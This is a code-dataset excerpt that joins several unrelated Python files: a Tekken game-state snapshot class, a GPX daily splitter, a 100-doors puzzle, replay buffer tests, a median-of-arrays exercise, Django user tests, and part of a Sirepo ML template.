data_dict['PlayerDataAddress.damage_taken']\n self.move_timer = data_dict['PlayerDataAddress.move_timer']\n self.recovery = data_dict['PlayerDataAddress.recovery']\n self.char_id = data_dict['PlayerDataAddress.char_id']\n self.throw_flag = data_dict['PlayerDataAddress.throw_flag']\n self.rage_flag = data_dict['PlayerDataAddress.rage_flag']\n self.input_counter = data_dict['PlayerDataAddress.input_counter']\n self.input_direction = InputDirection(\n data_dict['PlayerDataAddress.input_direction']\n )\n try:\n self.input_button = InputAttack(\n data_dict['PlayerDataAddress.input_attack']\n # % InputAttackCodes.xRAGE.value\n )\n except ValueError:\n self.__logger.debug(\n 'unknown input attack: %d',\n data_dict['PlayerDataAddress.input_attack']\n )\n self.input_button = InputAttack.NULL\n self.rage_button_flag = (\n data_dict['PlayerDataAddress.input_attack']\n >= InputAttack.B_RAGE.value\n )\n self.stun_state = StunStates(data_dict['PlayerDataAddress.stun_type'])\n self.is_power_crush = data_dict['PlayerDataAddress.power_crush'] > 0\n\n cancel_window_bitmask = data_dict['PlayerDataAddress.cancel_window']\n recovery_window_bitmask = data_dict['PlayerDataAddress.recovery']\n\n self.is_cancelable = (\n (CancelStatesBitmask.CANCELABLE.value & cancel_window_bitmask)\n == CancelStatesBitmask.CANCELABLE.value\n )\n self.is_bufferable = (\n (CancelStatesBitmask.BUFFERABLE.value & cancel_window_bitmask)\n == CancelStatesBitmask.BUFFERABLE.value\n )\n self.is_parry1 = (\n (CancelStatesBitmask.PARRYABLE_1.value & cancel_window_bitmask)\n == CancelStatesBitmask.PARRYABLE_1.value\n )\n self.is_parry2 = (\n (CancelStatesBitmask.PARRYABLE_2.value & cancel_window_bitmask)\n == CancelStatesBitmask.PARRYABLE_2.value\n )\n self.is_recovering = (\n (ComplexMoveStates.RECOVERING.value & recovery_window_bitmask)\n == ComplexMoveStates.RECOVERING.value\n )\n self.is_starting = self.startup > 0 and self.move_timer <= self.startup\n self.throw_tech = ThrowTechs(data_dict['PlayerDataAddress.throw_tech'])\n\n #self.highest_y = max(data_dict['PlayerDataAddress.y'])\n # self.lowest_y = min(data_dict['PlayerDataAddress.y'])\n\n # self.hitboxes = [\n # data_dict['PlayerDataAddress.hitbox1'],\n # data_dict['PlayerDataAddress.hitbox2'],\n # data_dict['PlayerDataAddress.hitbox3'],\n # data_dict['PlayerDataAddress.hitbox4'],\n # data_dict['PlayerDataAddress.hitbox5']\n # ]\n self.skeleton = (\n data_dict['PlayerDataAddress.x'], data_dict['PlayerDataAddress.y'],\n data_dict['PlayerDataAddress.z']\n )\n\n self.active_xyz = (\n data_dict['PlayerDataAddress.activebox_x'],\n data_dict['PlayerDataAddress.activebox_y'],\n data_dict['PlayerDataAddress.activebox_z']\n )\n\n self.is_jump = (\n data_dict['PlayerDataAddress.jump_flags']\n & JumpFlagBitmask.JUMP.value == JumpFlagBitmask.JUMP.value\n )\n self.hit_outcome = HitOutcome(\n data_dict['PlayerDataAddress.hit_outcome']\n )\n self.mystery_state = data_dict['PlayerDataAddress.mystery_state']\n\n #self.movelist_to_use = data_dict['PlayerDataAddress.movelist_to_use']\n\n self.current_side = BattleSide(\n data_dict['PlayerDataAddress.current_side']\n )\n\n self.wins = data_dict['EndBlockPlayerDataAddress.round_wins']\n self.combo_counter = (\n data_dict['EndBlockPlayerDataAddress.display_combo_counter']\n )\n self.combo_damage = (\n data_dict['EndBlockPlayerDataAddress.display_combo_damage']\n )\n self.juggle_damage = (\n data_dict['EndBlockPlayerDataAddress.display_juggle_damage']\n )\n\n self.use_opponents_movelist = data_dict['use_opponent_movelist']\n self.movelist_parser = data_dict['movelist_parser']\n\n try:\n self.character_name = CharacterIDs(\n data_dict['PlayerDataAddress.char_id']\n ).name\n except KeyError:\n self.character_name = \"UNKNOWN\"\n\n # def print_y_info(self):\n # print('{:.4f}, {:.4f}, {:.4f}'.format(\n # self.highest_y, self.lowest_y, self.highest_y - self.lowest_y)\n # )\n\n def is_character_name_loaded(self):\n \"\"\"\n\n \"\"\"\n # pylint: disable=no-member\n return self.character_name != CharacterIDs.NOT_YET_LOADED.name\n\n def get_input_state(self):\n \"\"\"\n\n \"\"\"\n return (\n self.input_direction,\n self.current_side,\n self.input_button,\n self.rage_button_flag\n )\n\n def get_traicking_type(self):\n \"\"\"\n\n \"\"\"\n # if self.complex_state.value < 8:\n return self.complex_state\n # else:\n # return ComplexMoveStates.UNKN\n\n def is_blocking(self):\n \"\"\"\n\n \"\"\"\n return self.complex_state == ComplexMoveStates.BLOCK\n\n def is_getting_counter_hit(self):\n \"\"\"\n\n \"\"\"\n return self.hit_outcome in (\n HitOutcome.COUNTER_HIT_CROUCHING,\n HitOutcome.COUNTER_HIT_STANDING\n )\n\n def is_getting_ground_hit(self):\n \"\"\"\n\n \"\"\"\n return self.hit_outcome in (\n HitOutcome.GROUNDED_FACE_DOWN, HitOutcome.GROUNDED_FACE_UP\n )\n\n def is_getting_wall_splatted(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in (\n SimpleMoveStates.WALL_SPLAT_18, SimpleMoveStates.WALL_SPLAT_19\n )\n\n def is_getting_hit(self):\n \"\"\"\n\n \"\"\"\n return self.stun_state in (\n StunStates.BEING_PUNISHED, StunStates.GETTING_HIT\n )\n # TODO: make this more accurate\n # return (\n # not self.is_cancelable\n # and self.complex_state == ComplexMoveStates.RECOVERING\n # and self.simple_state == SimpleMoveStates.STANDING_FORWARD\n # and self.attack_damage == 0\n # and self.startup == 0\n # )\n\n def is_hitting(self):\n \"\"\"\n\n \"\"\"\n return self.stun_state == StunStates.DOING_THE_HITTING\n\n def is_punish(self):\n \"\"\"\n\n \"\"\"\n return self.stun_state == StunStates.BEING_PUNISHED\n\n def is_attack_mid(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.MID\n\n def is_attack_unblockable(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type in {\n AttackType.HIGH_UNBLOCKABLE,\n AttackType.LOW_UNBLOCKABLE,\n AttackType.MID_UNBLOCKABLE\n }\n\n def is_attack_antiair(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.ANTIAIR_ONLY\n\n def is_attack_throw(self):\n \"\"\"\n\n \"\"\"\n return self.throw_flag == 1\n\n def is_attack_low(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.LOW\n\n def is_in_throwing(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.THROW\n\n def get_active_frames(self):\n \"\"\"\n\n \"\"\"\n return self.startup_end - self.startup + 1\n\n def is_attack_whiffing(self):\n \"\"\"\n\n \"\"\"\n return self.complex_state in {\n ComplexMoveStates.END1,\n ComplexMoveStates.F_MINUS,\n ComplexMoveStates.RECOVERING,\n ComplexMoveStates.UN17,\n ComplexMoveStates.SS,\n ComplexMoveStates.WALK\n }\n\n def is_on_ground(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in {\n SimpleMoveStates.GROUND_FACEDOWN,\n SimpleMoveStates.GROUND_FACEUP\n }\n\n def is_being_juggled(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state == SimpleMoveStates.JUGGLED\n\n def is_airborne(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state == SimpleMoveStates.AIRBORNE\n\n def is_holding_up(self):\n \"\"\"\n\n \"\"\"\n return self.input_direction == InputDirection.UP\n\n def is_holding_up_back(self):\n \"\"\"\n\n \"\"\"\n return self.input_direction == InputDirection.UP_BACK\n\n def is_technical_crouch(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in (\n SimpleMoveStates.CROUCH,\n SimpleMoveStates.CROUCH_BACK,\n SimpleMoveStates.CROUCH_FORWARD\n )\n\n def is_technical_jump(self):\n \"\"\"\n\n \"\"\"\n return self.is_jump\n # return self.simple_state in (\n # SimpleMoveStates.AIRBORNE,\n # SimpleMoveStates.AIRBORNE_26,\n # SimpleMoveStates.AIRBORNE_24\n # )\n\n def is_homing1(self):\n \"\"\"\n\n \"\"\"\n return self.complex_state == ComplexMoveStates.S_PLUS\n\n def is_homing2(self):\n \"\"\"\n\n \"\"\"\n return self.complex_state == ComplexMoveStates.S\n\n def is_being_knocked_down(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state == SimpleMoveStates.KNOCKDOWN\n\n def is_while_standing(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in {\n SimpleMoveStates.CROUCH, SimpleMoveStates.CROUCH_BACK,\n SimpleMoveStates.CROUCH_FORWARD\n }\n\n def is_wall_splat(self):\n \"\"\"\n\n \"\"\"\n # TODO: use the wall splat states in ComplexMoveStates move ids may\n # be different for 'big' characters\n return (\n self.move_id == 2396 or self.move_id == 2387\n or self.move_id == 2380 or self.move_id == 2382\n )\n\n def is_in_rage(self):\n \"\"\"\n\n \"\"\"\n return self.rage_flag > 0\n\n def is_attack_starting(self):\n \"\"\"\n\n \"\"\"\n # return self.complex_state in {\n # ComplexMoveStates.ATTACK_STARTING_1,\n # ComplexMoveStates.ATTACK_STARTING_2,\n # ComplexMoveStates.ATTACK_STARTING_3,\n # ComplexMoveStates.ATTACK_STARTING_5,\n # ComplexMoveStates.ATTACK_STARTING_6,\n # ComplexMoveStates.ATTACK_STARTING_7\n # } #doesn't work on several of Kazuya's moves, maybe others\n if self.startup > 0:\n is_active = self.move_timer <= self.startup\n return is_active\n return False\n\n def get_movelist_to_use(self):\n \"\"\"\n\n \"\"\"\n return self.get_movelist_to_use\n","sub_path":"tekken/bot_snapshot.py","file_name":"bot_snapshot.py","file_ext":"py","file_size_in_byte":13549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547622900","text":"# vim: expandtab tabstop=4 shiftwidth=4\n\n'''\nI dumped two years of tracklogs off my Garmin eTrex Venture HC\nusing GPSBabel to create a big GPX file. I needed a way to take\nthat big GPX file and break it down into a bunch of daily GPX files,\nso I created this script. It's more of a hack than I would like,\nespecially around XML namespaces; ElementTree doesn't eat its own\ndogfood, so parsed input doesn't preserve each attribute's\nnamespace, causing the ElementTree.write() to error out when the\ndefault_namespace is set.\n'''\n\nfrom argparse import ArgumentParser\nfrom datetime import datetime, timedelta\nfrom xml.etree import ElementTree as ET\n\nimport os\nimport sys\n\nnamespaces = { 'gpx': 'http://www.topografix.com/GPX/1/0' }\n\ndef get_date_for_trkseg(trkseg, utc_offset, epoch_offset):\n max_date = datetime(1970, 1, 1)\n utc_offset = timedelta(hours=utc_offset)\n epoch_offset = timedelta(days=1024*7*epoch_offset)\n\n for trkpt in trkseg:\n time_elem = trkpt.find('gpx:time', namespaces)\n date = datetime.strptime(time_elem.text, '%Y-%m-%dT%H:%M:%SZ')\n date += utc_offset + epoch_offset\n\n if date > max_date:\n max_date = date\n\n return max_date\n\ndef apply_epoch_offset(trkseg, epoch_offset):\n for trkpt in trkseg:\n time_elem = trkpt.find('gpx:time', namespaces)\n orig_time = datetime.strptime(time_elem.text, '%Y-%m-%dT%H:%M:%SZ')\n new_time = orig_time + timedelta(days=1024*7*epoch_offset)\n time_elem.text = new_time.strftime('%Y-%m-%dT%H:%M:%SZ')\n\ndef remove_trkseg_namespaces(trkseg):\n trkseg.tag = 'trkseg'\n\n for trkpt in trkseg:\n trkpt.tag = 'trkpt'\n ele = trkpt.find('gpx:ele', namespaces)\n ele.tag = 'ele'\n time = trkpt.find('gpx:time', namespaces)\n time.tag = 'time'\n\nclass Track:\n def __init__(self, date):\n self.date = date\n self.track_segments = []\n\n def __str__(self):\n return 'Track for {0} with {1} segments'.format(self.date, len(self.track_segments))\n\n def add_track_segment(self, ts, epoch_offset):\n apply_epoch_offset(ts, epoch_offset)\n remove_trkseg_namespaces(ts)\n self.track_segments.append(ts)\n\n def xml(self):\n gpx = ET.Element('gpx', attrib={\n 'version': '1.0',\n 'creator': 'https://github.com/gershwinlabs/photography/blob/master/gpx_per_day.py',\n 'xmlns': 'http://www.topografix.com/GPX/1/0',\n 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'xsi:schemaLocation': 'http://www.topografix.com/GPX/1/0 http://www.topografix.com/GPX/1/0/gpx.xsd',\n })\n\n trk = ET.SubElement(gpx, 'trk')\n name = ET.SubElement(trk, 'name')\n name.text = str(self.date)\n\n for track_segment in self.track_segments:\n trk.append(track_segment)\n\n return ET.tostring(gpx, encoding='UTF-8')\n\ndef check_utc_offset(offset):\n if offset < -12 or offset > 12:\n return 0, 'UTC offset too large'\n\n return offset, None\n\ndef setup_argparser():\n parser = ArgumentParser(description='Breaks a single GPX file into separate GPX files for each day.')\n parser.add_argument('--input', required=True, help='Input GPX file')\n parser.add_argument('--prefix', default='', required=False, help='Prefix that will be placed onto the name of each file')\n parser.add_argument('--utc_offset', default=0, type=int, required=False, help=\"UTC offset in hours, in case you're far from the prime meridian\")\n parser.add_argument('--epoch_offset', default=0, type=int, required=False, help='Epoch offset in units of 1024-weeks (10-bits week count from ICD-200)')\n parsed = parser.parse_args()\n return parsed\n\nif __name__ == \"__main__\":\n args = setup_argparser()\n infile_name = args.input\n outfile_prefix = args.prefix.strip()\n utc_offset, err = check_utc_offset(args.utc_offset)\n epoch_offset = args.epoch_offset\n \n if err != None:\n print(err)\n sys.exit(1)\n\n orig_root = ET.parse(infile_name).getroot()\n tracks = {}\n\n for trk in orig_root.findall('gpx:trk', namespaces):\n for trkseg in trk.findall('gpx:trkseg', namespaces):\n dt = get_date_for_trkseg(trkseg, utc_offset, epoch_offset)\n\n if dt.date() in tracks:\n tracks[dt.date()].add_track_segment(trkseg, epoch_offset)\n else:\n new_track = Track(dt.date())\n new_track.add_track_segment(trkseg, epoch_offset)\n tracks[dt.date()] = new_track\n\n for date, track in tracks.items():\n dt = datetime(date.year, date.month, date.day)\n\n sep = ''\n\n if len(outfile_prefix) > 0:\n sep = '-'\n\n outfile_name = '{0}{1}{2}.gpx'.format(outfile_prefix, sep, dt.strftime('%Y%m%d'))\n\n if os.path.exists(outfile_name):\n print('{0} already exists. Skipping...'.format(outfile_name))\n continue\n\n print(outfile_name)\n\n with open(outfile_name, 'wb') as f:\n f.write(track.xml())\n","sub_path":"gpx_per_day.py","file_name":"gpx_per_day.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45337379","text":"def divcheck(num):\n numOfDivs = 0\n for divs in range(1, num + 1):\n if num % divs == 0:\n numOfDivs += 1\n if numOfDivs % 2 != 0:\n numOfDivs = True\n else:\n numOfDivs = False\n return numOfDivs\nopndrs = []\nfor door in range(1, 101):\n numOfDivs = divcheck(door)\n if numOfDivs is True:\n opndrs.append(door)\nprint(\"The following doors are open:\")\nprint(opndrs)\n","sub_path":"100Doors.py","file_name":"100Doors.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"484548572","text":"import unittest\nimport random\nimport torch\nimport numpy as np\nimport torch_testing as tt\nfrom all.environments import State\nfrom all.memory import ExperienceReplayBuffer, PrioritizedReplayBuffer\n\nclass TestExperienceReplayBuffer(unittest.TestCase):\n def setUp(self):\n np.random.seed(1)\n random.seed(1)\n torch.manual_seed(1)\n self.replay_buffer = ExperienceReplayBuffer(5)\n\n def test_run(self):\n states = torch.arange(0, 20)\n actions = torch.arange(0, 20)\n rewards = torch.arange(0, 20)\n expected_samples = torch.tensor([\n [0, 0, 0],\n [1, 1, 0],\n [0, 1, 1],\n [3, 0, 0],\n [1, 4, 4],\n [1, 2, 4],\n [2, 4, 3],\n [4, 7, 4],\n [7, 4, 6],\n [6, 5, 6]\n ])\n expected_weights = np.ones((10, 3))\n actual_samples = []\n actual_weights = []\n for i in range(10):\n state = State(states[i].unsqueeze(0), torch.tensor([1]))\n next_state = State(states[i + 1].unsqueeze(0), torch.tensor([1]))\n self.replay_buffer.store(\n state, actions[i], rewards[i], next_state)\n sample = self.replay_buffer.sample(3)\n actual_samples.append(sample[0].features)\n actual_weights.append(sample[-1])\n tt.assert_equal(torch.cat(actual_samples).view(expected_samples.shape), expected_samples)\n np.testing.assert_array_equal(expected_weights, np.vstack(actual_weights))\n\nclass TestPrioritizedReplayBuffer(unittest.TestCase):\n def setUp(self):\n random.seed(1)\n np.random.seed(1)\n torch.manual_seed(1)\n self.replay_buffer = PrioritizedReplayBuffer(5, 0.6)\n\n def test_run(self):\n states = State(torch.arange(0, 20))\n actions = torch.arange(0, 20)\n rewards = torch.arange(0, 20)\n expected_samples = State(torch.tensor([\n [0, 2, 2],\n [0, 1, 1],\n [3, 3, 5],\n [5, 3, 6],\n [3, 5, 7],\n [8, 5, 8],\n [8, 5, 5],\n ]))\n expected_weights = [[1., 1., 1.],\n [0.56589746, 0.5124394, 0.5124394],\n [0.5124343, 0.5124343, 0.5124343],\n [0.5090894, 0.6456939, 0.46323255],\n [0.51945686, 0.5801515, 0.45691562],\n [0.45691025, 0.5096957, 0.45691025],\n [0.5938914, 0.6220026, 0.6220026]]\n actual_samples = []\n actual_weights = []\n for i in range(10):\n self.replay_buffer.store(\n states[i], actions[i], rewards[i], states[i+1])\n if i > 2:\n sample = self.replay_buffer.sample(3)\n sample_states = sample[0].features\n self.replay_buffer.update_priorities(torch.randn(3))\n actual_samples.append(sample_states)\n actual_weights.append(sample[-1])\n\n actual_samples = State(torch.cat(actual_samples).view((-1, 3)))\n self.assert_states_equal(actual_samples, expected_samples)\n np.testing.assert_array_almost_equal(\n expected_weights, np.vstack(actual_weights)\n )\n\n def assert_states_equal(self, actual, expected):\n tt.assert_almost_equal(actual.raw, expected.raw)\n tt.assert_equal(actual.mask, expected.mask)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"all/memory/replay_buffer_test.py","file_name":"replay_buffer_test.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574446563","text":"\"\"\"\n\n给定两个大小为 m 和 n 的有序数组 nums1 和 nums2。\n\n请你找出这两个有序数组的中位数,并且要求算法的时间复杂度为 O(log(m + n))。\n\n你可以假设 nums1 和 nums2 不会同时为空。\n\n示例 1:\n\nnums1 = [1, 3]\nnums2 = [2]\n\n则中位数是 2.0\n示例 2:\n\nnums1 = [1, 2]\nnums2 = [3, 4]\n\n则中���数是 (2 + 3)/2 = 2.5\n\"\"\"\n\n\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2) -> float:\n mid_ind = 0\n two_mid = True\n # 1. 确定中位数的index\n len_2_num = len(nums1) + len(nums2)\n if len_2_num % 2 == 0:\n mid_ind = len_2_num / 2 + 1\n two_mid = True\n elif len_2_num % 2 == 1:\n mid_ind = (len_2_num + 1) / 2\n two_mid = False\n # 2. 归并排序,直到数量等于 mid_ind\n i = 0\n j = 0\n c = []\n if len(nums1) == 0 or len(nums2) == 0:\n c = nums2 + nums1\n while len(c) <= mid_ind:\n if j > len(nums2) or nums1[i] <= nums2[j]:\n c.append(nums1[i])\n i += 1\n elif i > len(nums1) or nums1[i] >= nums2[j]:\n c.append(nums2[j])\n j += 1\n if two_mid:\n return float((c[-1] + c[-2])/2)\n else: return float(c[-1])\n\n\nif __name__ == '__main__':\n\n res = Solution().findMedianSortedArrays([1, 2], [3, 4])\n # res1 = Solution().findMedianSortedArrays([1, 2], [3])\n # res2 = Solution().findMedianSortedArrays([1], [1])\n print(res)\n # print(res1)\n # print(res2)\n","sub_path":"4_Median_of_Two_Sorted_Arrays.py","file_name":"4_Median_of_Two_Sorted_Arrays.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291347652","text":"import pytest\n\nfrom users.creator import UserCreator\n\npytestmark = [pytest.mark.django_db]\n\n\ndef test_existing_user(user):\n created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n created.refresh_from_db()\n\n assert created == user\n\n\ndef test_two_users_with_same_email(user, mixer):\n mixer.blend('users.User', email='rulon.oboev@gmail.com')\n created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n created.refresh_from_db()\n\n assert created == user\n\n\ndef test_two_users_with_same_email_case_is_case_insensitive(user, mixer):\n mixer.blend('users.User', username='RULON.OBOEV@gmail.com', email='11@gmail.com')\n created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n created.refresh_from_db()\n\n assert created == user\n\n\ndef test_existing_user_name_does_not_change(user):\n created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n created.refresh_from_db()\n\n assert created.first_name == user.first_name\n assert created.last_name == user.last_name\n assert created.first_name != 'Камаз'\n assert created.last_name != 'Отходов'\n","sub_path":"src/users/tests/user_creator/tests_user_creator_for_existing_users.py","file_name":"tests_user_creator_for_existing_users.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"631171271","text":"# -*- coding: utf-8 -*-\nu\"\"\"ML execution template.\n\n:copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved.\n:license: http://www.apache.org/licenses/LICENSE-2.0.html\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nfrom pykern import pkcompat\nfrom pykern import pkio\nfrom pykern import pkjson\nfrom pykern.pkcollections import PKDict\nfrom pykern.pkdebug import pkdp, pkdc, pkdlog\nfrom sirepo import simulation_db\nfrom sirepo.template import template_common\nimport csv\nimport numpy as np\nimport re\nimport sirepo.analysis\nimport sirepo.numpy\nimport sirepo.sim_data\nimport sirepo.util\n\n_SIM_DATA, SIM_TYPE, _SCHEMA = sirepo.sim_data.template_globals()\n\n_SIM_REPORTS = [\n 'analysisReport',\n 'fftReport',\n]\n\n_CLASSIFIER_OUTPUT_FILE = PKDict(\n dtClassifierClassificationFile='dt-classifier-classification.json',\n dtClassifierConfusionFile='dt-classifier-confusion.json',\n knnClassificationFile='classification.json',\n knnConfusionFile='confusion.json',\n knnErrorFile='error.npy',\n linearSvcConfusionFile='linear-svc-confusion.json',\n linearSvcErrorFile='linear-svc-error.npy',\n logisticRegressionClassificationFile='logistic-regression-classification.json',\n logisticRegressionConfusionFile='logistic-regression-confusion.json',\n logisticRegressionErrorFile='logistic-regression-error.npy',\n)\n\n_OUTPUT_FILE = PKDict(\n classificationOutputColEncodingFile='classification-output-col-encoding.json',\n fitCSVFile='fit.csv',\n predictFile='predict.npy',\n scaledFile='scaled.npy',\n testFile='test.npy',\n trainFile='train.npy',\n validateFile='validate.npy',\n **_CLASSIFIER_OUTPUT_FILE\n)\n\n_REPORTS = [\n 'fileColumnReport',\n 'partitionColumnReport',\n 'partitionSelectionReport',\n] + _SIM_REPORTS\n\n\ndef background_percent_complete(report, run_dir, is_running):\n data = simulation_db.read_json(run_dir.join(template_common.INPUT_BASE_NAME))\n res = PKDict(\n percentComplete=0,\n frameCount=0,\n )\n if report == 'classificationAnimation' and not is_running:\n s = list(filter(\n lambda path: path.basename in _CLASSIFIER_OUTPUT_FILE.values(),\n pkio.sorted_glob(run_dir.join('*')),\n ))\n return PKDict(\n framesForClassifier=data.models.classificationAnimation.classifier,\n frameCount=1 if s else 0,\n percentComplete=100,\n )\n line = template_common.read_last_csv_line(run_dir.join(_OUTPUT_FILE.fitCSVFile))\n m = re.search(r'^(\\d+)', line)\n if m and int(m.group(1)) > 0:\n max_frame = data.models.neuralNet.epochs\n res.frameCount = int(m.group(1)) + 1\n res.percentComplete = float(res.frameCount) * 100 / max_frame\n return res\n\n\ndef get_analysis_report(run_dir, data):\n report = data.models[data.report]\n info = data.models.columnInfo\n x_idx = int(report.x)\n y_idx = int(report.y1)\n x_label = f'{info.header[x_idx]}'\n y_label = f'{info.header[y_idx]}'\n\n plot_data = _read_file_with_history(run_dir, _OUTPUT_FILE.scaledFile, report)\n x = plot_data[:, x_idx]\n y = plot_data[:, y_idx]\n plots = [\n PKDict(\n points=y.tolist(),\n label=y_label,\n style='scatter',\n )\n ]\n fields = PKDict()\n summary_data = PKDict()\n if 'action' in report:\n if report.action == 'fit':\n p_vals, p_errs, fit_plots = _get_fit_report(report, x, y)\n summary_data.p_vals = p_vals.tolist()\n summary_data.p_errs = p_errs.tolist()\n plots.extend(fit_plots)\n elif report.action == 'cluster':\n fields.clusters = _compute_clusters(report, plot_data)\n return x, plots, f'{x_label} vs {y_label}', fields, summary_data\n\n\n#TODO(MVK): 2d fft (?)\ndef get_fft_report(run_dir, data):\n info = data.models.columnInfo\n col = data.models.fftReport.column\n idx = int(col)\n label = f'{info.header[idx]}'\n\n t, y = _extract_column(run_dir, idx)\n w, n = sirepo.analysis.get_fft(t, y)\n\n plots = [\n PKDict(\n points=n,\n label=f'{label}',\n ),\n ]\n\n summaryData = PKDict(\n freqs=[],\n minFreq=w[0],\n maxFreq=w[-1]\n )\n\n return w, plots, f'FFT', summaryData\n\n\ndef get_application_data(data, **kwargs):\n if data.method == 'compute_column_info':\n return _compute_column_info(data.dataFile)\n raise AssertionError(f'unknown get_application_data: {data}')\n\n\ndef prepare_sequential_output_file(run_dir, data):\n report = data['report']\n if 'fileColumnReport' in report or 'partitionColumnReport':\n fn = simulation_db.json_filename(template_common.OUTPUT_BASE_NAME, run_dir)\n if fn.exists():\n fn.remove()\n try:\n save_sequential_report_data(run_dir, data)\n except IOError:\n # the output file isn't readable\n pass\n\n\ndef python_source_for_model(data, model):\n return _generate_parameters_file(data)\n\n\ndef save_sequential_report_data(run_dir, sim_in):\n assert _is_valid_report(sim_in.report), 'unknown report: {}'.format(sim_in.report)\n if 'fileColumnReport' in sim_in.report:\n _extract_file_column_report(run_dir, sim_in)\n elif 'partitionColumnReport' in sim_in.report:\n _extract_partition_report(run_dir, sim_in)\n elif sim_in.report == 'partitionSelectionReport':\n _extract_partition_selection(run_dir, sim_in)\n elif 'analysisReport' in sim_in.report:\n _extract_analysis_report(run_dir, sim_in)\n elif 'fftReport' in sim_in.report:\n _extract_fft_report(run_dir, sim_in)\n\n\ndef sim_frame(frame_args):\n return _fit_animation(frame_args)\n\n\ndef sim_frame_dtClassifierClassificationMetricsAnimation(frame_args):\n return _classification_metrics_report(\n frame_args,\n _OUTPUT_FILE.dtClassifierClassificationFile,\n )\n\n\ndef sim_frame_dtClassifierConfusionMatrixAnimation(frame_args):\n return _confusion_matrix_to_heatmap_report(\n frame_args,\n _OUTPUT_FILE.dtClassifierConfusionFile,\n 'Decision Tree Confusion Matrix',\n )\n\n\ndef sim_frame_epochAnimation(frame_args):\n #TODO(pjm): improve heading text\n header = ['epoch', 'loss', 'val_loss']\n path = str(frame_args.run_dir.join(_OUTPUT_FILE.fitCSVFile))\n\n v = sirepo.numpy.ndarray_from_csv(path, True)\n if len(v.shape) == 1:\n v.shape = (v.shape[0], 1)\n return _report_info(\n v[:, 0],\n [PKDict(\n points=v[:, i].tolist(),\n label=header[i],\n ) for i in (1, 2)],\n ).pkupdate(PKDict(\n x_label=header[0],\n ))\n\ndef sim_frame_knnClassificationMetricsAnimation(frame_args):\n return _classification_metrics_report(\n frame_args,\n _OUTPUT_FILE.knnClassificationFile,\n )\n\n\ndef sim_frame_knnConfusionMatrixAnimation(frame_args):\n return _confusion_matrix_to_heatmap_report(\n frame_args,\n _OUTPUT_FILE.knnConfusionFile,\n 'K={k}',\n )\n\ndef sim_frame_knnErrorRateAnimation(frame_args):\n return _error_rate_report(\n frame_args,\n _OUTPUT_FILE.knnErrorFile,\n 'K Value',\n )\n\n\ndef sim_frame_linearSvcConfusionMatrixAnimation(frame_args):\n return _confusion_matrix_to_heatmap_report(\n frame_args,\n _OUTPUT_FILE.linearSvcConfusionFile,\n 'tolerance={tol_svc_best}',\n )\n\n\ndef sim_frame_linearSvcErrorRateAnimation(frame_args):\n v = np.load(str(frame_args.run_dir.join(_OUTPUT_FILE.linearSvcErrorFile)))\n return _report_info(\n v[:, 0],\n [PKDict(\n points=v[:, 1].tolist(),\n label='Mean Error',\n )],\n ).pkupdate(PKDict(\n x_label='Tolerance',\n ))\n\n\ndef sim_frame_logisticRegressionConfusionMatrixAnimation(frame_args):\n return _confusion_matrix_to_heatmap_report(\n frame_args,\n _OUTPUT_FILE.logisticRegressionConfusionFile,\n 'C={c}',\n )\n\n\ndef sim_frame_logisticRegressionClassificationMetricsAnimation(frame_args):\n return _classification_metrics_report(\n frame_args,\n _OUTPUT_FILE.logisticRegressionClassificationFile,\n )\n\n\ndef sim_frame_logisticRegressionErrorRateAnimation(frame_args):\n return _error_rate_report(\n frame_args,\n _OUTPUT_FILE.logisticRegressionErrorFile,\n 'C',\n )\n\n\ndef write_parameters(data, run_dir, is_parallel):\n pkio.write_text(\n run_dir.join(template_common.PARAMETERS_PYTHON_FILE),\n _generate_parameters_file(data),\n )\n\n\ndef _classification_metrics_report(frame_args, filename):\n def _get_lables():\n l = []\n for k in d:\n if not isinstance(d[k], PKDict):\n continue\n for x in d[k]:\n if x not in l:\n l.append(x)\n return l\n\n def _get_matrix():\n r = []\n for k in d:\n if not isinstance(d[k], PKDict):\n continue\n try:\n x = [e[k]]\n except KeyError:\n x = [k]\n x.extend(d[k].values())\n r.append(x)\n return r\n\n e = _get_classification_output_col_encoding(frame_args)\n d = pkjson.load_any(frame_args.run_dir.join(filename))\n return PKDict(\n labels=_get_lables(),\n matrix=_get_matrix(),\n )\n\n\ndef _compute_column_info(dataFile):\n f = dataFile.file\n if re.search(r'\\.npy$', f):\n return _compute_numpy_info(f)\n return _compute_csv_info(f)\n\n\ndef _compute_csv_info(filename):\n res = PKDict(\n hasHeaderRow=True,\n rowCount=0,\n )\n row = None\n with open(_filepath(filename)) as f:\n for r in csv.reader(f):\n if not row:\n 